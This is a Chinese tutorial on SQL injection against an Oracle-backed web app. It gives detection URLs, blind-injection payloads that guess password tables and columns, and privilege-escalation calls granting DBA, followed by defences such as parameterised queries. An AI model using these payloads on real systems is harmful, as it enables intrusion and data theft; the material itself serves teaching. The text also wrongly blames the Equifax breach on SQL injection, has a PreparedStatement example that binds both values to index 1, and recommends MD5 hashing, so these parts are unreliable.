目錄

• 1. 前言
• 2. SQL注入簡介
• （1）SQL語言
• （2）SQL注入
• 3. SQL注入步驟
• （1）發(fā)現(xiàn)漏洞
• （2）信息收集
• （3）攻擊Web系統(tǒng)（猜解用戶名和密碼）
• （4）獲取管理員權(quán)限
• 4. 防范SQL注入
• （1）使用參數(shù)化查詢或存儲(chǔ)過程
• （2）用戶輸入檢測
• （3）SQL語法分析
• （4）其他

1. 前言

隨著互聯(lián)網(wǎng)的發(fā)展和普及，網(wǎng)絡(luò)安全問題越來越突出，網(wǎng)絡(luò)在為用戶提供越來越多服務(wù)的同時(shí)，也要面對(duì)各類越來越復(fù)雜的惡意攻擊。SQL注入（SQL Injection）攻擊是其中最普遍的安全隱患之一，它利用應(yīng)用程序?qū)τ脩糨斎霐?shù)據(jù)的信任，將惡意SQL代碼注入到應(yīng)用程序中，從而執(zhí)行攻擊者的操作。這種攻擊可以導(dǎo)致敏感信息泄露、數(shù)據(jù)損壞或刪除及系統(tǒng)癱瘓，給企業(yè)和個(gè)人帶來巨大損失。因此，如何防范SQL注入攻擊成為了網(wǎng)絡(luò)安全領(lǐng)域的一個(gè)重要議題。

在國外，SQL注入最早出現(xiàn)在1999年；在我國大約出現(xiàn)在2002年。2015年，約翰·卡特爾（John McAfee）的網(wǎng)站遭到了SQL注入攻擊，導(dǎo)致黑客獲取了網(wǎng)站上全部的注冊(cè)用戶信息。2016年，Yahoo公司披露了兩起大規(guī)模數(shù)據(jù)泄露事件，其中涉及的一次就是通過SQL注入攻擊獲得的。2017年，Equifax公司遭到了一次嚴(yán)重的數(shù)據(jù)泄露事件，泄露了超過1.43億條用戶記錄。調(diào)查人員發(fā)現(xiàn)，攻擊者使用了SQL注入攻擊。

可見，SQL注入攻擊破壞敏感數(shù)據(jù)的完整性和可用性，給網(wǎng)絡(luò)用戶和企業(yè)造成了巨大的生活困擾和經(jīng)濟(jì)損失。

2. SQL注入簡介

（1）SQL語言

Structured Query Language(簡稱SQL)是—種結(jié)構(gòu)化查詢語言，一種數(shù)據(jù)庫文本語言。SQL用于同關(guān)系數(shù)據(jù)庫進(jìn)行交互，能夠執(zhí)行對(duì)數(shù)據(jù)庫的查詢、獲取數(shù)據(jù)庫的信息、向數(shù)據(jù)庫插入新的紀(jì)錄、刪除及更新數(shù)據(jù)庫中的記錄。

SQL有很多種類，但大多都基于ANSI標(biāo)準(zhǔn)SQL-92。SQL執(zhí)行的單位是一個(gè)“query”，該“query”可以是一系列語句集合，返回一個(gè)結(jié)果集。SQL語句可以修改數(shù)據(jù)庫結(jié)構(gòu)(使用數(shù)據(jù)定義語言DDL)和操作數(shù)據(jù)庫內(nèi)容(使用數(shù)據(jù)操作語言DML)。SQL語言本身造成了SQL注入漏洞，給SQL注入攻擊帶來了可能性。

（2）SQL注入

SQL注入攻擊是一種利用應(yīng)用程序漏洞的攻擊方式。攻擊者通過向應(yīng)用程序發(fā)送構(gòu)造的惡意SQL語句，欺騙應(yīng)用程序執(zhí)行這些SQL語句，如果Web應(yīng)用沒有適當(dāng)?shù)尿?yàn)證用戶輸入的信息，攻擊者就有可能改變后臺(tái)執(zhí)行的SQL語句的結(jié)構(gòu)，獲取相應(yīng)結(jié)果。攻擊者可以利用SQL注入漏洞獲取數(shù)據(jù)庫中的敏感信息，修改或刪除數(shù)據(jù)庫中的數(shù)據(jù)，或者完全控制Web服務(wù)器。

比如基于表單登錄功能的應(yīng)用程序，通過執(zhí)行一個(gè)簡單的SQL查詢來確認(rèn)每次登錄，以下是這個(gè)查詢的一個(gè)典型實(shí)例：

SELECT * FROM users WHERE username="alice" and password="secret"

這個(gè)查詢要求數(shù)據(jù)庫檢查用戶表中的每一行，提取username值為alice并且password值為secret的記錄。如果返回一條用戶記錄，該用戶即可成功登錄。

攻擊者可注入用戶名或密碼字段來修改程序執(zhí)行的查詢，一般是輸入雙連字符（--）注釋掉其余部分或類似’ or ‘1’ =‘1用引號(hào)包含的字符串?dāng)?shù)據(jù)來“平衡引號(hào)”，來破壞查詢的邏輯。比如攻擊者可以通過提交用戶名為alice’--或alice’ or ‘1’=‘1，密碼為任意，應(yīng)用程序?qū)?zhí)行以下查詢：

SELECT * FROM users WHERE username="alice"--‘" and password="any"

或

SELECT * FROM users WHERE username=" alice" or ‘1"=‘1" and password="any"

這兩條查詢均等同于

SELECT * FROM users WHERE username="alice"

從而避開了密碼檢查，成功登錄。

因此SQL注入漏洞本質(zhì)上是針對(duì)程序員編程中的漏洞，利用SQL的語法在應(yīng)用程序與數(shù)據(jù)庫交互的SQL語句中插入精心編制的額外的SQL語句，從而對(duì)數(shù)據(jù)庫進(jìn)行非法查詢和修改。由于程序運(yùn)行SQL語句時(shí)的權(quán)限與當(dāng)前該組建（例如，數(shù)據(jù)庫服務(wù)器、Web應(yīng)用服務(wù)器）的權(quán)限相同，而這些組件一般的運(yùn)行權(quán)限都很高，而且經(jīng)常是以管理員的權(quán)限運(yùn)行，所以攻擊者可能獲得數(shù)據(jù)庫的完全控制，并執(zhí)行系統(tǒng)命令。

3. SQL注入步驟

SQL注入攻擊有多種類型，包括基于錯(cuò)誤的注入、聯(lián)合查詢注入、堆疊查詢注入等。其中，基于錯(cuò)誤的注入是最常見的類型。攻擊者通過發(fā)送包含惡意SQL語句的輸入數(shù)據(jù)來觸發(fā)應(yīng)用程序中的錯(cuò)誤，從而獲取有關(guān)數(shù)據(jù)庫結(jié)構(gòu)和內(nèi)容的信息。

（1）發(fā)現(xiàn)漏洞

可以用經(jīng)典的1=1，1=2測試法測試SQL注入是否存在。

以http://www.test.com/profile.do?id=113為例，使用以下測試方案：

• http://www.test.com/profile.do?id=113’
• http://www.test.com/profile.do?id=113 and 1=1
• http://www.test.com/profile.do?id=113 and 1=2

（2）信息收集

確認(rèn)系統(tǒng)表是否存在，主要利用Oracle數(shù)據(jù)庫中以下系統(tǒng)表：

• all_tables：存放當(dāng)前ID和其他用戶的所有表
• user_tables：存放當(dāng)前用戶所有表
• user_tab_columns：存放當(dāng)前用戶表的所有列

測試以下URL：

• http://www.test.com/profile.do?id=113’and 0<>(select count(*) from all_tables) and '1'='1
• http://www.test.com/profile.do?id=113’and 0<>(select count(*) from user_tables)and '1'='1
• http://www.test.com/profile.do?id=113’and 0<>(select count(*) from user_tab_ columns) and '1'='1

 如果以上頁面都能正確返回，說明存在猜測的系統(tǒng)表。

（3）攻擊Web系統(tǒng)（猜解用戶名和密碼）

首先查找當(dāng)前用戶是否有敏感列名：

"and 0<>(select count(*) from user_tab_columns where column_name like "%25PASS%25") and "1"="1

正常返回說明存在類似PASS的字段，猜解該字段對(duì)應(yīng)的表名。先確定表名的長度（不斷改變length(table_name)后的數(shù)值）：

"and 0<>(select count(*) from user_tables where length(table_name)>8 and table_ name like"%25PASS%25") and "1"="1

利用ASCII二分法猜解表名（不斷改變substr函數(shù)的參數(shù)及比較值）：

"and  (ascii(substr((select table_name from user_tab_columns where column_name like "%PASS%" And Rownum<=1),1,1))>64) and "1"="1

猜字段同樣先確定長度，然后利用ASCII二分法猜解字段名：

"and 0<>(select count(*) from user_tables where table_name="T_SYSUSER"and length (column_ name) >8  and column_name like "%PASS%") and "1"="1

"and  (ascii(substr((select column_name from user_tab_columns where table_name ="T_SYSUSER" and column_name like "%25PASS%25"),1,1))>64) and "1"="1

得到用戶表的USERNAME和PASSWD兩列的名稱后，依然是利用ASCII碼猜解法來一步一步確定USERNAME和PASSWD的值，不再詳述。

（4）獲取管理員權(quán)限

要想獲取對(duì)系統(tǒng)的完全控制，還要有系統(tǒng)的管理員權(quán)限。Oracle包含許多可在數(shù)據(jù)庫管理員權(quán)限下運(yùn)行的內(nèi)置存儲(chǔ)過程，并發(fā)現(xiàn)在這些存儲(chǔ)過程中存在SQL注入漏洞。2006年7月補(bǔ)丁發(fā)布之前，存在于默認(rèn)包SYS.DBMS_ EXPORT_EXTERSION.GET_DOMAIN_INDEX_TABLES中的缺陷就是一個(gè)典型的示例。攻擊者可以利用這個(gè)缺陷，在易受攻擊的字段中注入GRANT DBA TO PUBLIC查詢（需要換成char形式）來提升權(quán)限。

這種類型的攻擊可通過利用Web程序中的SQL注入漏洞，在易受攻擊的參數(shù)中輸入函數(shù)來實(shí)現(xiàn)。許多其他類型的缺陷也影響到Oracle的內(nèi)置組件。一個(gè)示例是CTXSYS.DRILOAD.VALIDATE_STMT函數(shù)。這個(gè)函數(shù)的目的是檢查一個(gè)指定的字符串中是否包含一個(gè)有效的SQL語句。早期Oracle版本中，在確定被提交的語句的過程中，這個(gè)函數(shù)實(shí)際執(zhí)行了該語句。這意味著任何用戶只需向這個(gè)函數(shù)提交一個(gè)語句，就能夠作為數(shù)據(jù)庫管理員執(zhí)行該語句。例如：

exec CTXSYS.DRILOAD.VALIDATE_STMT(‘GRANT DBA TO PUBLIC")

除這些漏洞外，Oracle還含有大量默認(rèn)功能，這些功能可被低權(quán)限用戶訪問，并可用于執(zhí)行各種敏感操作，建立網(wǎng)絡(luò)連接或訪問文件系統(tǒng)。比如，可利用UTL_HTTP 包里面的 request函數(shù)構(gòu)造注射，來建立用戶，并賦予DBA權(quán)限。

4. 防范SQL注入

（1）使用參數(shù)化查詢或存儲(chǔ)過程

參數(shù)化查詢分兩個(gè)步驟建立一個(gè)包含用戶輸入的SQL語句：

• 應(yīng)用程序制定查詢結(jié)構(gòu)，為用戶輸入的每個(gè)數(shù)據(jù)預(yù)留占位符；
• 應(yīng)用程序制定每個(gè)占位符的內(nèi)容。
  在第二步中指定的專門設(shè)計(jì)的數(shù)據(jù)無法破壞在第一步中指定的查詢結(jié)構(gòu)。由于查詢結(jié)構(gòu)已經(jīng)確定，且相關(guān)API 對(duì)任何類型的占位符數(shù)據(jù)進(jìn)行安全處理，因此它總被解釋為數(shù)據(jù)，而非語句結(jié)構(gòu)的一部分。

 Java提供以下API，允許應(yīng)用程序創(chuàng)建一個(gè)預(yù)先編譯的SQL語句，并以可靠且類型安全的方式指定它的參數(shù)占位符的值：

 java.sql.Connection.prepareStatement
 java.sql.PrepareStatement.*

使用如下：

String username = request.getParameter("j_username");
String passwd = request.getParameter("j_password");
String query = "select * from t_sysuser where username=? and passwd=?";
PreparedStatement stmt = con.prepareStatement(query);
stmt.setString(1, username);
stmt.setString(1, passwd);
ResultSet rs=stmt.executeQuery();

如果用戶提交的用戶名為alice’ or 1=1--，密碼為any，生成的查詢等同于：

select * from t_sysuser where username= ‘a(chǎn)lice" ‘or 1=1--" and passwd="any"

由此可見使用參數(shù)化查詢可以有效防止SQL注入，應(yīng)在每一個(gè)數(shù)據(jù)庫查詢中使用參數(shù)化查詢。如果僅注意用戶直接提交的輸入，二階SQL注入攻擊就很容易被忽略因?yàn)橐呀?jīng)被處理的數(shù)據(jù)被認(rèn)為是可信的。另外參數(shù)占位符不能用于指定查詢中表和列的名稱，如果應(yīng)用程序需要根據(jù)用戶提交的數(shù)據(jù)在SQL查詢中指定這些數(shù)據(jù)行，需要使用一份由已知可靠的值組成的“白名單”（即數(shù)據(jù)庫中表和列的名稱），并拒絕任何與這份名單上數(shù)據(jù)不匹配的輸入項(xiàng)。或者對(duì)用戶輸入實(shí)施嚴(yán)格的確認(rèn)機(jī)制。

使用存儲(chǔ)過程的原理與參數(shù)化查詢類似，傳入的參數(shù)在最后被執(zhí)行的SQL語句中會(huì)被數(shù)據(jù)庫服務(wù)器軟件進(jìn)行處理，使得輸入的字符串會(huì)被當(dāng)作一個(gè)單純的文本參數(shù)參與到SQL查詢中。不論是攻擊者輸入什么參數(shù)都不會(huì)改變?cè)O(shè)計(jì)者編寫的SQL語句的語義，也就防止了SQL注入。另外由于存儲(chǔ)過程是預(yù)編譯的，對(duì)復(fù)雜的SQL語句，效率有很大程度上的提升，還可以進(jìn)一步減少查詢時(shí)客戶端發(fā)送到服務(wù)端的數(shù)據(jù)包。

（2）用戶輸入檢測

對(duì)輸入進(jìn)行檢測一般是在客戶端和服務(wù)器端利用正則表達(dá)式來匹配SQL的特殊字符及其等值的十六進(jìn)制形式，包括單引號(hào)（’）、雙重破折號(hào)（–）、SELECT、UNION等查詢關(guān)鍵字，然后對(duì)其進(jìn)行替換或者過濾。但是在所有的接受輸入的程序部分都嚴(yán)格的執(zhí)行檢測卻很難，而且會(huì)產(chǎn)生誤報(bào)。

（3）SQL語法分析

SQL注入根源在于對(duì)于用戶提交的請(qǐng)求沒有足夠的驗(yàn)證機(jī)制，正常的用戶輸入是具有邏輯整體含義的簡單結(jié)構(gòu)，而實(shí)施 SQL 注入的字符串一定是包含 SQL語法片段的復(fù)合結(jié)構(gòu)。 SQL 注入攻擊本質(zhì)上是希望后臺(tái)數(shù)據(jù)庫的 SQL 解釋程序按照不同的方式解釋組裝好的 SQL 語句，如果用戶輸入的字符串不包含 SQL 語法片段，顯然無法達(dá)到這個(gè)目的。

靜態(tài)代碼分析中能從語法、語義上理解程序行為，直接分析被測程序特征，尋找可能導(dǎo)致錯(cuò)誤的異常。因此可以在服務(wù)器端采用一種類似于靜態(tài)代碼分析的SQL 語法預(yù)分析策略來防止SQL注入。首先將 SQL 注入分類，并對(duì)其進(jìn)行詞法分析和語法分析，抽象出各類注入的語法結(jié)構(gòu)，生成語法分析樹；能夠利用該語法分析樹通過機(jī)器學(xué)習(xí)的方法來得到預(yù)想的SQL注入的集合，并從該集合中生成新的語法分析樹；然后將用戶提交的輸入預(yù)先組裝成完整的 SQL 語句，對(duì)該語句進(jìn)行語法分析，如果發(fā)現(xiàn)具有 SQL 注入特征的語法結(jié)構(gòu)，則判定為 SQL 注入攻擊。判定的唯一依據(jù)是抽象的語法結(jié)串，而非具體的特征字符串，避免了傳統(tǒng)的特征字符串匹配策略固有的高識(shí)別率和低誤判率之間的矛盾。

由于SQL注入利用的是正常的服務(wù)端口，在各類Web應(yīng)用中已不能通過使用防火墻，SSL等網(wǎng)絡(luò)層保護(hù)技術(shù)來阻止應(yīng)用層攻擊，也就是說安全邊界擴(kuò)展到了系統(tǒng)源代碼。因此，必須通過防范軟件代碼中存在的安全漏洞，從而保障系統(tǒng)的安全。

（4）其他

通過在程序中對(duì)口令等敏感信息加密，（一般采用MD5函數(shù)），另外在原來的加密的基礎(chǔ)上可以增加一些非常規(guī)的方式，即在MD5加密的基礎(chǔ)上附帶一些值 如密文=MD5 (MD5 (明文)+系統(tǒng)時(shí)間)；編碼時(shí)注意屏蔽網(wǎng)頁上顯示的異常與出錯(cuò)信息，并對(duì)源代碼進(jìn)行安全審查及軟件安全測試。

安全配置服務(wù)器，包括目錄最小化權(quán)限設(shè)置：給靜態(tài)網(wǎng)頁目錄和動(dòng)態(tài)網(wǎng)頁目錄分別設(shè)置不同權(quán)限，盡量不給寫目錄權(quán)限；修改或者去掉 Web 服務(wù)器上默認(rèn)的一些危險(xiǎn)命令，例如ftp、cmd等 需要時(shí)再復(fù)制到相應(yīng)目錄；正確配置iptables及Oracle的sqlnet.ora文件，通過IP地址限制對(duì)于數(shù)據(jù)庫訪問。

以上就是一文搞懂SQL注入攻擊的詳細(xì)內(nèi)容，更多關(guān)于SQL注入攻擊的資料請(qǐng)關(guān)注其它相關(guān)文章！